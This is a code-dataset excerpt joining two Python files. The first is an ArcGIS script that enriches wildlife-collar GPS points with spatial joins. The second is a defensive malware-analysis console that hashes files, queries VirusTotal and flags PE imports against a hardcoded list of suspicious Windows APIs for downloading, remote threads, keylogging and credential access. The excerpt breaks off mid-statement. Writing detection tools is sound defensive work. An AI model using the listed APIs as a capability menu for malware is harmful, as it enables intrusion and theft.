datetime import datetime as dt\r\nimport time\r\nimport logging\r\nimport logging.handlers\r\nimport google.cloud.logging\r\nimport sys\r\nimport traceback\r\nimport arcpy\r\nimport os\r\nfrom os.path import basename\r\nfrom os.path import join\r\nimport multilog\r\n\r\n\r\narcpy.env.workspace = \"in_memory\" \r\narcpy.env.overwriteOutput = True\r\narcpy.env.preserveGlobalIds = True\r\n\r\n\r\nVERSION = '1.0.0'\r\n\r\nLOCAL_LOGS = '../logs/enricher.log'\r\n\r\nSD_LOG_NAME = 'python.scheduled'\r\nLABELS = {'file': basename(__file__), 'version': VERSION}\r\nSD_LOGGING_KEY = '../.secrets/python-logging.json'\r\nCLOUD_LOGGING = True\r\n\r\nclass Config(object):\r\n \"\"\"Configs for script inputs and outputs.\"\"\"\r\n json_type_key = '__input_config__'\r\n\r\n def __init__(\r\n self,\r\n workspace, \r\n collars_table, \r\n date_field, \r\n globalid_field,\r\n related_guid_field,\r\n output_table):\r\n \r\n self.workspace = workspace\r\n self.collars_table = collars_table\r\n self.date_field = date_field\r\n self.globalid_field = globalid_field\r\n self.related_guid_field = related_guid_field\r\n self.output_table = output_table\r\n \r\n @staticmethod\r\n def decode_config(dct):\r\n \"\"\"Decode config from json.\"\"\"\r\n if Config.json_type_key in dct:\r\n configs = Config(\r\n dct['workspace'], \r\n dct['collars_table'], \r\n dct['date_field'], \r\n dct['globalid_field'], \r\n dct['related_guid_field'], \r\n dct['output_table'])\r\n return configs\r\n else:\r\n return dct\r\n \r\n @staticmethod\r\n def encode_config(config):\r\n \"\"\"Encode config to json.\"\"\"\r\n if isinstance(config, Config):\r\n field_dict = config.__dict__\r\n field_dict[Config.json_type_key] = ''\r\n return field_dict\r\n else:\r\n type_name = config.__class__.__name__\r\n raise TypeError('Object of type {} is not JSON serializable'.format(type_name))\r\n\r\n\r\nclass EnrichmentData(object):\r\n \"\"\"Features used for point enrichment.\"\"\"\r\n def __init__(self, path, field_mappings):\r\n self.path = path\r\n self.field_mappings = field_mappings\r\n \r\n @staticmethod\r\n def decode_enrichment(dct):\r\n \"\"\"Decode enrichment data feature from json.\"\"\"\r\n if 'path' in dct and 'field_mappings' in dct:\r\n return EnrichmentData(dct['path'], dct['field_mappings'])\r\n else:\r\n return dct\r\n \r\n @staticmethod\r\n def encode_enrichment(enrichment):\r\n \"\"\"Encode enrichment data feature to json.\"\"\"\r\n if isinstance(enrichment, EnrichmentData):\r\n field_dict = enrichment.__dict__\r\n return field_dict\r\n else:\r\n type_name = enrichment.__class__.__name__\r\n raise TypeError('Object of type {} is not JSON serializable'.format(type_name))\r\n\r\n\r\ndef get_querylayer_for_yesterday(workspace, table_name, guid_field, date_field, today=None):\r\n \"\"\"Create a query layer that includes only data for the previous day.\"\"\"\r\n if today is None:\r\n yesterday = dt.now() - timedelta(days=1)\r\n else:\r\n yesterday = today - timedelta(days=1)\r\n\r\n start_of_day = dt(yesterday.year, yesterday.month, yesterday.day)\r\n start_day_string = dt.strftime(start_of_day, \"%Y-%m-%d %H:%M:%S\")\r\n end_of_day = start_of_day + timedelta(days=1)\r\n end_day_string = dt.strftime(end_of_day, \"%Y-%m-%d %H:%M:%S\")\r\n logger.multi_log('Making query layer for {}. 
Date range: {} to {}'.format(\r\n        table_name,\r\n        start_day_string, \r\n        end_day_string),\r\n        'INFO')\r\n    # where clause for the time range\r\n    where_clause = \\\r\n    \"\"\"\r\n    select {fields_list} from {table} \r\n    where \r\n    {field} >= '{start}'\r\n    AND\r\n    {field} < '{end}'\r\n    \"\"\".format(\r\n        fields_list=guid_field + ', SHAPE',\r\n        table=table_name,\r\n        field=date_field,\r\n        start=start_day_string,\r\n        end=end_day_string)\r\n    \r\n    ql_name = \"date_query_result\"\r\n    ql_start_time = time.time()\r\n    arcpy.MakeQueryLayer_management(\r\n        workspace, ql_name, where_clause)\r\n    ql_time = round(time.time() - ql_start_time, 4)\r\n    logger.multi_log('Query layer creation time: {} seconds'.format(ql_time),\r\n        'INFO',\r\n        CLOUD_LOGGING,\r\n        {'action': 'ql creation',\r\n        'feature': table_name,\r\n        'time': ql_time})\r\n    \r\n    return ql_name\r\n\r\n\r\ndef get_enriched_points(querylayer_points, enrichment_data, fields_to_keep):\r\n    \"\"\"Join points to enrichment feature and keep specified fields.\"\"\"\r\n    # defining features for the spatial join\r\n    join_features = enrichment_data\r\n    join_describe = arcpy.Describe(join_features)\r\n    target_features = querylayer_points\r\n    target_describe = arcpy.Describe(target_features)\r\n    join_output = 'in_memory\\\\spatial_join'\r\n    temp_out_name = join_output\r\n    n = 1\r\n    while arcpy.Exists(temp_out_name):\r\n        temp_out_name = join_output + str(n)\r\n        n += 1\r\n    join_output = temp_out_name\r\n\r\n    logger.multi_log(\r\n        'Enriching {} with {}'.format(target_describe.name, join_describe.name),\r\n        'INFO',\r\n        CLOUD_LOGGING)\r\n    logger.multi_log('Keep fields: {}'.format(','.join(fields_to_keep)), 'DEBUG')\r\n\r\n    if join_describe.spatialReference.name != target_describe.spatialReference.name:\r\n        logger.multi_log(\r\n            'Spatial reference mismatch: join={}, target={}'.format(\r\n                join_describe.spatialReference.name,\r\n                target_describe.spatialReference.name),\r\n            'WARNING',\r\n            CLOUD_LOGGING,\r\n            {'feature': basename(join_features)})\r\n\r\n    # field map to determine which fields to keep\r\n    fieldmappings = arcpy.FieldMappings()\r\n    # Add all fields from inputs.\r\n    fieldmappings.addTable(join_features)\r\n    fieldmappings.addTable(target_features)\r\n\r\n    keep_fields = set([f.lower() for f in fields_to_keep])\r\n    # Check that keep fields are actually in these data\r\n    mapped_field_names = set([f.name.lower() for f in fieldmappings.fields])\r\n    field_intersect = keep_fields.intersection(mapped_field_names)\r\n    if field_intersect != keep_fields:\r\n        logger.multi_log(\r\n            'Keep fields not in either dataset: {}'.format(','.join(keep_fields - field_intersect)),\r\n            'WARNING')\r\n\r\n    for field in fieldmappings.fields:\r\n        if field.name.lower() not in keep_fields:\r\n            fieldmappings.removeFieldMap(\r\n                fieldmappings.findFieldMapIndex(field.name))\r\n\r\n    # Join datasets spatially\r\n    join_start_time = time.time()\r\n    arcpy.analysis.SpatialJoin(\r\n        target_features, join_features, join_output,\r\n        \"JOIN_ONE_TO_ONE\",\r\n        \"KEEP_ALL\",\r\n        fieldmappings)\r\n    join_time = round(time.time() - join_start_time, 4)\r\n    logger.multi_log(\r\n        'Join processing time: {} seconds'.format(join_time),\r\n        'INFO',\r\n        CLOUD_LOGGING,\r\n        {'action': 'join',\r\n        'feature': basename(join_features),\r\n        'time': join_time,\r\n        'message': 'Join processing'})\r\n\r\n    # removing unneeded fields created from join\r\n    arcpy.DeleteField_management(join_output, [\"Join_Count\", \"TARGET_FID\"])\r\n\r\n    return join_output\r\n\r\n\r\ndef mutliple_enrichment(querylayer_points, globalid_field, 
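The WHERE clause brackets exactly one calendar day: midnight at the start of yesterday up to, but not including, midnight today. A deterministic check of that window arithmetic, using an arbitrary pinned "today" so the expected strings are fixed:

```python
# Verify the day-window math used by get_querylayer_for_yesterday with a
# pinned reference date; the date chosen here is arbitrary.
from datetime import datetime as dt, timedelta

today = dt(2021, 6, 15, 9, 30)          # arbitrary fixed timestamp
yesterday = today - timedelta(days=1)
start_of_day = dt(yesterday.year, yesterday.month, yesterday.day)
end_of_day = start_of_day + timedelta(days=1)

assert dt.strftime(start_of_day, "%Y-%m-%d %H:%M:%S") == "2021-06-14 00:00:00"
assert dt.strftime(end_of_day, "%Y-%m-%d %H:%M:%S") == "2021-06-15 00:00:00"
```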
enrichment_features):\r\n \"\"\"Enrich points with fields from list of feature classes.\"\"\"\r\n enriched = querylayer_points\r\n accumulated_fields = [globalid_field]\r\n for feature in enrichment_features:\r\n old_enriched = enriched\r\n accumulated_fields.extend([f[0] for f in feature.field_mappings])\r\n enriched = get_enriched_points(\r\n enriched,\r\n feature.path,\r\n accumulated_fields)\r\n arcpy.Delete_management(old_enriched)\r\n \r\n return enriched\r\n\r\n\r\ndef _get_config(config_location):\r\n \"\"\"Get input and output configs from json.\"\"\"\r\n with open(config_location, 'r') as json_file:\r\n configs = json.load(json_file, object_hook=Config.decode_config)\r\n\r\n return configs\r\n\r\n\r\ndef _get_enrichment_data(config_location):\r\n enrichment_data = []\r\n with open(config_location, 'r') as json_file:\r\n enrichment_data = json.load(json_file, object_hook=EnrichmentData.decode_enrichment)\r\n\r\n return enrichment_data\r\n\r\n\r\ndef _load_data(enriched_points, destination_table, enrichment_features, globalid_field, related_guid_field):\r\n logger.multi_log('Loading data into: ' + destination_table, 'INFO', CLOUD_LOGGING)\r\n source_fields = []\r\n destination_fields = []\r\n for feature in enrichment_features:\r\n for source, dest in feature.field_mappings:\r\n source_fields.append(source)\r\n destination_fields.append(dest)\r\n source_fields.append(globalid_field)\r\n destination_fields.append(related_guid_field)\r\n\r\n with arcpy.da.SearchCursor(enriched_points, source_fields) as enriched_cursor, \\\r\n arcpy.da.InsertCursor(destination_table, destination_fields) as destination_cursor:\r\n for row in enriched_cursor:\r\n destination_cursor.insertRow(row)\r\n\r\n\r\nif __name__ == '__main__':\r\n # Set directory to the directory of this file.\r\n dir_path = os.path.dirname(os.path.realpath(__file__))\r\n os.chdir(dir_path)\r\n \r\n input_config_location = '../configs/point_enrichment_input.json'\r\n enrichment_config_location = '../configs/point_enrichment_data.json'\r\n\r\n configs = _get_config(input_config_location)\r\n\r\n enrichment_features = _get_enrichment_data(enrichment_config_location)\r\n\r\n logger = multilog.MutliLogger('enricher', LOCAL_LOGS, SD_LOGGING_KEY, SD_LOG_NAME, LABELS)\r\n \r\n try:\r\n ql_name = get_querylayer_for_yesterday(\r\n configs.workspace,\r\n configs.collars_table,\r\n configs.globalid_field,\r\n configs.date_field)\r\n ql_count = arcpy.management.GetCount(ql_name)[0]\r\n logger.multi_log(\r\n 'Query layer point count: {}'.format(ql_count),\r\n 'INFO',\r\n CLOUD_LOGGING,\r\n {'action': 'ql count',\r\n 'feature': configs.collars_table,\r\n 'count': ql_count})\r\n \r\n # Query Layers don't spatially join correctly and won't copy to in_memory\r\n output_gdb = join(dir_path, '..', 'data', 'enrichment_output.gdb')\r\n if not arcpy.Exists(output_gdb):\r\n arcpy.management.CreateFileGDB(os.path.dirname(output_gdb), os.path.basename(output_gdb))\r\n \r\n logger.multi_log('Copying query layer points locally', 'INFO', CLOUD_LOGGING)\r\n points_feature = arcpy.management.CopyFeatures(ql_name, join(output_gdb, 'points'))[0]\r\n\r\n enriched = mutliple_enrichment(\r\n points_feature,\r\n configs.globalid_field,\r\n enrichment_features)\r\n\r\n _load_data(\r\n enriched,\r\n join(configs.workspace, configs.output_table),\r\n enrichment_features,\r\n configs.globalid_field,\r\n configs.related_guid_field)\r\n\r\n except Exception as e:\r\n logger.multi_log(\r\n e,\r\n 'ERROR',\r\n CLOUD_LOGGING)\r\n finally:\r\n 
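_get_enrichment_data expects point_enrichment_data.json to hold a list of objects that decode_enrichment turns into EnrichmentData instances. A hypothetical file with placeholder paths and field names — each field_mappings entry is a [source, destination] pair that _load_data later uses to map enriched columns into the output table:

```python
# Decode a hypothetical enrichment config; all paths and field names
# below are invented for illustration.
import json

example = '''[
    {"path": "C:/data/reference.gdb/land_ownership",
     "field_mappings": [["OWNER", "land_owner"]]},
    {"path": "C:/data/reference.gdb/game_units",
     "field_mappings": [["UNIT_ID", "game_unit"]]}
]'''

features = json.loads(example, object_hook=EnrichmentData.decode_enrichment)
print(features[0].path, features[1].field_mappings)
```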
logging.shutdown()","repo_name":"agrc/dwr-tracking","sub_path":"src/point_enricher.py","file_name":"point_enricher.py","file_ext":"py","file_size_in_byte":11350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2583716392","text":"#!/usr/bin/python3\n#-*- coding:utf-8 -*-\n\nimport sys\nimport time\nimport json\nimport shlex\nimport subprocess\n\ntry:\n from xsearch import * # virustotal search\nexcept ImportError:\n print(\"[!] Error Import Xsearch !\")\n\ntry:\n from md5sum import *\nexcept ImportError:\n print(\"[!] Error Import MD5sum !\")\n\ntry:\n from datetime import datetime\nexcept ImportError:\n print(\"[!] Error Import Datetime !\")\n\ntry:\n import requests\nexcept ImportError:\n print(\"[!] Requests Required !\")\n\ntry:\n import pefile\nexcept ImportError:\n print(\"[!] PEfile Required !\")\n\ntry:\n from tabulate import tabulate\nexcept ImportError:\n print(\"[!] Tabulate Required !\")\n\n\nbanner = '''\n\\033[38;5;160m\n\n ███▄ ▄███▓ ██████ ▄████▄ ▄▄▄ ███▄ █ \n▓██▒▀█▀ ██▒▒██ ▒ ▒██▀ ▀█ ▒���███▄ ██ ▀█ █ \n▓██ ▓██░░ ▓██▄ ▒▓█ ▄ ▒██ ▀█▄ ▓██ ▀█ ██▒\n▒██ ▒██ ▒ ██▒▒▓▓▄ ▄██▒░██▄▄▄▄██ ▓██▒ ▐▌██▒\n▒██▒ ░██▒▒██████▒▒▒ ▓███▀ ░ ▓█ ▓██▒▒██░ ▓██░\n░ ▒░ ░ ░▒ ▒▓▒ ▒ ░░ ░▒ ▒ ░ ▒▒ ▓▒█░░ ▒░ ▒ ▒ \n░ ░ ░░ ░▒ ░ ░ ░ ▒ ▒ ▒▒ ░░ ░░ ░ ▒░\n░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ \n ░ ░ ░ ░ ░ ░ ░ \n ░ \n \n\\033[00m\n Automatic Analysis Tools\n\n [ Created By \\033[38;5;160mUnam3dd \\033[00m ]\n [ Github : \\033[38;5;160mUnam3dd \\033[00m ]\n\n'''\n\nMALICIOUS_FUNCTION = [\"accept\",\"AdjustTokenPrivileges\",\"AttachThreadInput\",\n\"bind\",\"BitBlt\",\"CallNextHookEx\",\n\"CertOpenSystemStore\",\"CheckRemoteDebuggerPresent\",\"CoCreateInstance\",\n\"connect\",\"ConnectNamedPipe\",\"ControlService\",\n\"CreateFile\",\"CreateFileMapping\",\"CreateMutex\",\n\"CreateProcess\",\"CreateRemoteThread\",\"CreateService\",\n\"CreateToolhelp32Snapshot\",\"CryptAcquireContext\",\"DeviceIoControl\",\n\"DllCanUnloadNow\",\"DllGetClassObject\",\"DllInstall\",\n\"DllRegisterServer\",\"DllUnregisterServer\",\"EnableExecuteProtectionSupport\",\n\"EnumProcesses\",\"EnumProcessModules\",\"FindFirstFile/FindNextFile\",\n\"FindResource\",\"FindWindow\",\"FtpPutFile\",\"GetAdaptersInfo\",\n\"GetAsyncKeyState\",\"GetDC\",\"GetForegroundWindow\",\n\"gethostbyname\",\"gethostname\",\"GetKeyState\",\"GetModuleFilename\",\n\"GetModuleHandle\",\"GetProcAddress\",\"GetStartupInfo\",\"GetSystemDefaultLangId\",\n\"GetTempPath\",\"GetThreadContext\",\"GetTickCount\",\"GetVersionEx\",\n\"GetWindowsDirectory\",\"inet_addr\",\"InternetOpen\",\"InternetOpenUrl\",\n\"InternetReadFile\",\"InternetWriteFile\",\"IsDebuggerPresent\",\"IsNTAdmin\",\n\"IsWoW64Process\",\"LdrLoadDll\",\"LoadLibrary\",\"LoadResource\",\"LsaEnumerateLogonSessions\",\n\"MapViewOfFile\",\"MapVirtualKey\",\"MmGetSystemRoutineAddress\",\"Module32First/Module32Next\",\n\"NetScheduleJobAdd\",\"NetShareEnum\",\"NtQueryDirectoryFile\",\"NtQueryInformationProcess\",\n\"NtSetInformationProcess\",\"OleInitialize\",\"OpenMutex\",\"OpenProcess\",\"OpenSCManager\",\n\"OutputDebugString\",\"PeekNamedPipe\",\"Process32First\",\"Process32Next\",\"QueryPerformanceCounter\",\n\"QueueUserAPC\",\"ReadProcessMemory\",\"recv\",\"RegisterHotKey\",\"RegOpenKey\",\"ResumeThread\",\n\"RtlCreateRegistryKey\",\"RtlWriteRegistryValue\",\"SamIConnect\",\"SamIGetPrivateData\",\n\"SamQueryInformationUse\",\"send\",\"SetFileTime\",\"SetThreadContext\",\"SetWindowsHookEx\",\n\"SfcTerminateWatcherThread\",\"ShellExecute\",\"StartServiceCtrlDispatcher\",\n\"Susp
endThread\",\"system\",\"Thread32First\",\"Thread32Next\",\"Toolhelp32ReadProcessMemory\",\n\"URLDownloadToFile\",\"VirtualAllocEx\",\"VirtualProtectEx\",\"WideCharToMultiByte\",\"WinExec\",\n\"WlxLoggedOnSAS\",\"Wow64DisableWow64FsRedirection\",\"WriteProcessMemory\",\"WSAStartup\",\n\"WSASocketA\",\"WSAConnect\",\"WSAGetLastError\",\"closesocket\",\"htons\",\"ShellExecuteA\",\"_popen\"\n\"GetStartupInfoA\",\"FreeConsole\",\"CreateProcessA\",\"CreateMutexA\",\"GetTokenInformation\",\"GetUserNameA\",\"FtpPutFileA\",\"FtpGetFileA\",\n\"InternetOpenA\",\"InternetConnectA\"]\n\ndef check_malicious_function(pe):\n if pe.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_IMPORT']].VirtualAddress ==0:\n print(\"[!] Import Not Found !\")\n \n import_table = []\n for entry in pe.DIRECTORY_ENTRY_IMPORT:\n dll_name = entry.dll.decode(\"utf-8\")\n for imp in entry.imports:\n if imp.name == None:\n import_name = \"Ordinal: \" + str(imp.ordinal)\n else:\n import_name = imp.name.decode(\"utf-8\")\n \n import_table.append([import_name,dll_name])\n \n function_len = len(import_table)\n print(\"\\033[32m[\\033[34m*\\033[32m] Function in Binary File : %d \" % (function_len))\n headers = [\"Potential Malicious Function Found\",\"DLL\"]\n ml_get = []\n count_mf = len(MALICIOUS_FUNCTION)\n print(\"\\033[32m[\\033[34m*\\033[32m] Potential Malicious Function : %d \" % (count_mf))\n for table_function in import_table:\n for ml in MALICIOUS_FUNCTION:\n if ml == table_function[0]:\n ml_get.append([\"\\033[34m%s\\033[00m\" % (ml),\"\\033[38;5;184m%s\\033[00m\" % (table_function[1])])\n else:\n pass\n \n ratio = []\n count_ml = len(ml_get)\n ratio.append([count_ml,count_mf])\n \n print(tabulate(ml_get,headers=headers,tablefmt=\"fancy_grid\"))\n print(tabulate(ratio,headers=[\"Potential Malicious Function\",\"Total Binary Function\"],tablefmt=\"fancy_grid\"))\n\n\ndef get_imports_function(pe):\n\tif pe.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_IMPORT']].VirtualAddress == 0:\n\t\tprint(\"no imports found\")\n\n\timport_table = []\n\theaders = [\"Import Name\", \"DLL Name\"]\n\n\tfor entry in pe.DIRECTORY_ENTRY_IMPORT:\n\t\tdll_name = entry.dll.decode(\"utf-8\")\n\t\tfor imp in entry.imports:\n\t\t\tif imp.name == None: import_name = \"Ordinal: \" + str(imp.ordinal)\n\t\t\telse: import_name = imp.name.decode(\"utf-8\")\n\t\t\timport_table.append([import_name, dll_name])\n\n\tprint(tabulate(import_table, headers=headers, tablefmt=\"fancy_grid\"))\n\ndef sha256sum(filename):\n f=open(filename,\"r\",encoding=\"cp437\")\n content = f.read()\n f.close()\n h = hashlib.sha256()\n h.update(content.encode(\"cp437\"))\n hex_digest = h.hexdigest()\n return hex_digest\n\ndef sha256sum_bin(filename):\n f=open(filename,\"rb\")\n content = f.read()\n f.close()\n h = hashlib.sha256()\n h.update(content)\n hex_digest = h.hexdigest()\n return hex_digest\n\n\nif __name__ == '__main__':\n python_version()\n clear_os()\n print(banner)\n while True:\n try:\n t = datetime.now().strftime(\"%H:%M:%S\")\n console = str(input(\"\\033[00m[\\033[38;5;160m%s\\033[00m:Malware@Main] \\033[38;5;160m>> \" % (t)))\n\n if console ==\"exit\" or console ==\"quit\":\n sys.exit()\n \n elif console.startswith(\"!\")==True:\n os.system(console[1:])\n \n elif console ==\"help\" or console ==\"?\" or console ==\"h\":\n print(\"[****************************************************************]\")\n print(\"[ Malware Scan ]\")\n print(\"[ commands descriptions ]\")\n print(\"[ ---------- -------------- 
]\")\n print(\"[ banner Banner ]\")\n print(\"[ cls or clear Clear Console ]\")\n print(\"[ xsearch_uf Xsearch upload file to virtustotal ]\")\n print(\"[ xsearch_sh Xsearch with hash file ]\")\n print(\"[ xsearch_uu Xsearch Scan URL ]\")\n print(\"[ !command !dir, !type etc... ]\")\n print(\"[ md5sum Get Hash Md5 Of target file ]\")\n print(\"[ md5sumbin Get MD5 Bin File ]\")\n print(\"[ sha256sum Get SHA256 File ]\")\n print(\"[ sha256sumbin Get SHA256 Bin File ]\")\n print(\"[ show_import Get Import Function From PE File ]\")\n print(\"[ check_function Check Function Malicious in Binary ]\")\n print(\"[ dump_info Dump PE info of Binary File ]\")\n print(\"[ strings Strings Output ]\")\n print(\"[****************************************************************]\")\n print(\"\\n\\n\")\n \n elif console ==\"clear\" or console ==\"cls\":\n clear_os()\n \n elif console.startswith(\"show_import\")==True:\n shlex_console_si = shlex.split(console)\n if len(shlex_console_si) < 2:\n print(\"\\033[38;5;160m[!] Error Show Import : %s \\033[00m\" % (shlex_console_si[0]))\n else:\n try:\n p = pefile.PE(shlex_console_si[1])\n get_imports_function(p)\n except:\n print(\"\\033[38;5;160m[!] Error Show Import \")\n \n\n elif console.startswith(\"strings\")==True:\n shlex_console_strings = shlex.split(console)\n if len(shlex_console_strings) < 2:\n print(\"\\033[38;5;160m[!] Error Show Import : %s \\033[00m\" % (shlex_console_si[0]))\n else:\n try:\n p = subprocess.Popen([\"strings\",shlex_console_strings[1]],shell=True,stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out_p = p.stdout.read() + p.stderr.read()\n out_p = out_p.decode(\"utf-8\")\n print(out_p)\n except:\n print(\"\\033[38;5;160m[!] Error Show strings\")\n\n \n elif console.startswith(\"dump_info\")==True:\n shlex_console_di = shlex.split(console)\n if len(shlex_console_di) < 2:\n print(\"\\033[38;5;160m[!] Error Dump Info : %s \\033[00m\" % (shlex_console_si[0]))\n else:\n try:\n p = pefile.PE(shlex_console_di[1])\n p.print_info()\n except:\n print(\"\\033[38;5;160m[!] Error dump_info\")\n \n elif console.startswith(\"check_function\")==True:\n shlex_console_f = shlex.split(console)\n if len(shlex_console_f) < 2:\n print(\"\\033[38;5;160m[!] Error Show Import : %s \" % (shlex_console_f[0]))\n else:\n try:\n p = pefile.PE(shlex_console_f[1])\n check_malicious_function(p)\n except:\n print(\"\\033[38;5;160m[!] Error Show Import\")\n\n \n elif console.startswith(\"md5sum\")==True:\n shlex_console_main = shlex.split(console)\n if len(shlex_console_main) < 2:\n print(\"\\033[38;5;160m[!] Error : usage md5sum \")\n else:\n check_file_exists = os.path.exists(shlex_console_main[1])\n if check_file_exists ==True:\n print(\"\\033[32m[\\033[34m*\\033[32m] %s Found !\\033[00m\" % (shlex_console_main[1]))\n h = md5sum(shlex_console_main[1])\n b = get_bytes(shlex_console_main[1])\n print(\"\\033[32m[\\033[34m*\\033[32m] MD5 RAW Hash : %s\\n\\033[32m[\\033[34m*\\033[32m] Filename : %s\\n\\033[32m[\\033[34m*\\033[32m] Size : %d Bytes\" % (h,shlex_console_main[1],b))\n else:\n print(\"\\033[38;5;160m[!] Error %s Not Found !\\033[00m\" % (shlex_console_main[1]))\n \n elif console.startswith(\"md5sumbin\") ==True:\n shlex_console_main = shlex.split(console)\n if len(shlex_console_main) < 2:\n print(\"\\033[38;5;160m[!] 
Error : usage md5sumbin <file>\")\n                else:\n                    check_file_exists = os.path.exists(shlex_console_main[1])\n                    if check_file_exists ==True:\n                        print(\"\\033[32m[\\033[34m*\\033[32m] %s Found !\\033[00m\" % (shlex_console_main[1]))\n                        h = md5sum_bin(shlex_console_main[1])\n                        b = get_bytes(shlex_console_main[1])\n                        print(\"\\033[32m[\\033[34m*\\033[32m] MD5 BIN Hash : %s\\n\\033[32m[\\033[34m*\\033[32m] Filename : %s\\n\\033[32m[\\033[34m*\\033[32m] Size : %d Bytes\" % (h,shlex_console_main[1],b))\n                    else:\n                        print(\"\\033[38;5;160m[!] Error %s Not Found !\\033[00m\" % (shlex_console_main[1]))\n            \n            elif console.startswith(\"sha256sum\")==True and console.startswith(\"sha256sumbin\")==False:\n                shlex_console_main = shlex.split(console)\n                if len(shlex_console_main) < 2:\n                    print(\"\\033[38;5;160m[!] Error : usage sha256sum <file>\")\n                else:\n                    check_file_exists = os.path.exists(shlex_console_main[1])\n                    if check_file_exists ==True:\n                        print(\"\\033[32m[\\033[34m*\\033[32m] %s Found !\\033[00m\" % (shlex_console_main[1]))\n                        h = sha256sum(shlex_console_main[1])\n                        b = get_bytes(shlex_console_main[1])\n                        print(\"\\033[32m[\\033[34m*\\033[32m] SHA256 RAW Hash : %s\\n\\033[32m[\\033[34m*\\033[32m] Filename : %s\\n\\033[32m[\\033[34m*\\033[32m] Size : %d Bytes\" % (h,shlex_console_main[1],b))\n                    else:\n                        print(\"\\033[38;5;160m[!] Error %s Not Found !\\033[00m\" % (shlex_console_main[1]))\n            \n            elif console.startswith(\"sha256sumbin\")==True:\n                shlex_console_main = shlex.split(console)\n                if len(shlex_console_main) < 2:\n                    print(\"\\033[38;5;160m[!] Error : usage sha256sumbin <file>\")\n                else:\n                    check_file_exists = os.path.exists(shlex_console_main[1])\n                    if check_file_exists ==True:\n                        print(\"\\033[32m[\\033[34m*\\033[32m] %s Found !\\033[00m\" % (shlex_console_main[1]))\n                        h = sha256sum_bin(shlex_console_main[1])\n                        b = get_bytes(shlex_console_main[1])\n                        print(\"\\033[32m[\\033[34m*\\033[32m] SHA256 BIN Hash : %s\\n\\033[32m[\\033[34m*\\033[32m] Filename : %s\\n\\033[32m[\\033[34m*\\033[32m] Size : %d Bytes\" % (h,shlex_console_main[1],b))\n                    else:\n                        print(\"\\033[38;5;160m[!] Error %s Not Found !\\033[00m\" % (shlex_console_main[1]))\n            \n            elif console ==\"xsearch_uf\":\n                FILENAME = \"None\"\n                while True:\n                    try:\n                        t = datetime.now().strftime(\"%H:%M:%S\")\n                        console_xsearch_uf = str(input(\"\\033[00m[\\033[38;5;160m%s\\033[00m:Malware@Xsearch_upload_file] \\033[38;5;160m>> \" % (t)))\n                        \n                        if console_xsearch_uf ==\"exit\" or console_xsearch_uf ==\"quit\":\n                            sys.exit()\n                        \n                        elif console_xsearch_uf ==\"back\" or console_xsearch_uf ==\"b\":\n                            break\n\n                        elif console_xsearch_uf.startswith(\"!\")==True:\n                            os.system(console_xsearch_uf[1:])\n                        \n                        elif console_xsearch_uf ==\"help\" or console_xsearch_uf ==\"?\" or console_xsearch_uf ==\"h\":\n                            print(\"[ commands descriptions ]\")\n                            print(\"[ ---------- -------------- ]\")\n                            print(\"[ info show info module ]\")\n                            print(\"[ set FILENAME,etc... ]\")\n                            print(\"[ back Back To Main ]\")\n                            print(\"[ run Run Module ]\")\n                            print(\"\\n\")\n                            print(\"\\n\")\n                        \n                        elif console_xsearch_uf ==\"info\":\n                            print(\"[ NAME VALUE\")\n                            print(\"[ ---------- --------------\")\n                            print(\"[ FILENAME %s\" % (FILENAME))\n\n                        elif console_xsearch_uf.startswith(\"set\")==True:\n                            shlex_console = shlex.split(console_xsearch_uf)\n                            if len(shlex_console) <3:\n                                print(\"\\033[38;5;160m[!] 
Error usage : example : set FILENAME <file> for show options type 'info'\\033[00m\")\n                            else:\n                                if shlex_console[1] ==\"filename\" or shlex_console[1] ==\"FILENAME\":\n                                    value_filename = shlex_console[2]\n                                    check_value = os.path.exists(value_filename)\n                                    if check_value ==True:\n                                        print(\"\\033[32m[\\033[34m*\\033[32m] %s Found !\\033[00m\" % (value_filename))\n                                        FILENAME = value_filename\n                                        print(\"\\033[32m[\\033[34m*\\033[32m] FILENAME => %s \\033[00m\" % (FILENAME))\n                                    else:\n                                        print(\"\\033[38;5;160m[!] Error %s Not Found !\\033[00m\" % (value_filename))\n                        \n                        elif console_xsearch_uf.startswith(\"run\")==True:\n                            if FILENAME == \"None\":\n                                print(\"\\033[38;5;160m[!] Error FILENAME => None !\\033[00m\")\n                            else:\n                                print(\"\\033[32m[\\033[34m*\\033[32m] if you don't have a key you can create one from this link\\nLink=> \\033[34mhttps://developers.virustotal.com/v3.0/reference\\033[00m\")\n                                api_key = str(input(\"\\033[00m[\\033[38;5;160m%s\\033[00m:Enter Virustotal API Key \\033[38;5;160m>> \" % (t)))\n                                send_file_api(api_key,FILENAME)\n\n                        else:\n                            print(\"\\033[38;5;160m[!] Error Command Not Found !\")\n\n                    except KeyboardInterrupt:\n                        print(\"\\033[38;5;160m[!] Error CTRL+C\")\n            \n            elif console ==\"xsearch_sh\":\n                FILENAME = \"None\"\n                while True:\n                    try:\n                        t = datetime.now().strftime(\"%H:%M:%S\")\n                        console_xsearch_sh = str(input(\"\\033[00m[\\033[38;5;160m%s\\033[00m:Malware@Xsearch_search_hash] \\033[38;5;160m>> \" % (t)))\n                        \n                        if console_xsearch_sh ==\"exit\" or console_xsearch_sh ==\"quit\":\n                            sys.exit()\n                        \n                        elif console_xsearch_sh ==\"back\" or console_xsearch_sh ==\"b\":\n                            break\n\n                        elif console_xsearch_sh.startswith(\"!\")==True:\n                            os.system(console_xsearch_sh[1:])\n                        \n                        elif console_xsearch_sh ==\"help\" or console_xsearch_sh ==\"?\" or console_xsearch_sh ==\"h\":\n                            print(\"[ commands descriptions ]\")\n                            print(\"[ ---------- -------------- ]\")\n                            print(\"[ info show info module ]\")\n                            print(\"[ set FILENAME,etc... ]\")\n                            print(\"[ back Back To Main ]\")\n                            print(\"[ run Run Module ]\")\n                            print(\"\\n\")\n                            print(\"\\n\")\n                        \n                        elif console_xsearch_sh ==\"info\":\n                            print(\"[ NAME VALUE\")\n                            print(\"[ ---------- --------------\")\n                            print(\"[ FILENAME %s\" % (FILENAME))\n                            print(\"\")\n\n                        elif console_xsearch_sh.startswith(\"set\")==True:\n                            shlex_console = shlex.split(console_xsearch_sh)\n                            if len(shlex_console) <3:\n                                